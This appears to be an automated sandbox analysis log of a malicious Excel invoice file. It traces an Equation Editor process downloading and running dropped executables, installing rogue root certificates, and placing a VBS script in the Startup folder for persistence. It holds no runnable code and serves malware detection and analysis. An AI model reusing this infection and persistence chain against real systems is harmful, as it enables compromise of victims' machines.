              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: dwmapi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64win.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64cpu.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winnsi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: dwmapi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64win.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64cpu.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winnsi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: dwmapi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64win.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64cpu.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winnsi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: dwmapi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64win.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64cpu.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winnsi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: dwmapi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64win.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64cpu.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winnsi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: dwmapi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64win.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64cpu.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winnsi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: dwmapi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64win.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64cpu.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winnsi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: dwmapi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64win.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64cpu.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winnsi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: dwmapi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64win.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64cpu.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winnsi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: dwmapi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64win.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64cpu.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winnsi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: dwmapi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64win.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wow64cpu.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winnsi.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeSection loaded: dwmapi.dll
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
              Source: FACTURA.xlsxStatic file information: File size 2130920 > 1048576
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Source: FACTURA.xlsxInitial sample: OLE indicators vbamacros = False
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0094DA30 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,5_2_0094DA30
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_3_02B076E6 push ebx; iretd 5_3_02B076E9
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_00828945 push ecx; ret 5_2_00828958
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_01388945 push ecx; ret 6_2_01388958
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 18_2_00CAFF10 push es; retf 18_2_00CAFF1E
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1

              Persistence and Installation Behavior

              barindex
              Installs new ROOT certificates
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035C03D5 LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_035C03D5
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeFile created: C:\Users\user\AppData\Local\complacence\outvaunts.exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HKP098767890HJ[1].exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Temp\kudo.exeJump to dropped file

              Boot Survival

              barindex
              Drops VBS files to the startup folder
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbsJump to dropped file
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbsJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_008048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_008048D7
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_00885376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,5_2_00885376
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013648D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,6_2_013648D7
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013E5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,6_2_013E5376
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_00823187 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_00823187
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_5-105473
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeAPI coverage: 4.7 %
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeAPI coverage: 4.6 %
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3700Thread sleep time: -180000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0086445A GetFileAttributesW,FindFirstFileW,FindClose,5_2_0086445A
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0086C6D1 FindFirstFileW,FindClose,5_2_0086C6D1
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0086C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_0086C75C
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0086EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_0086EF95
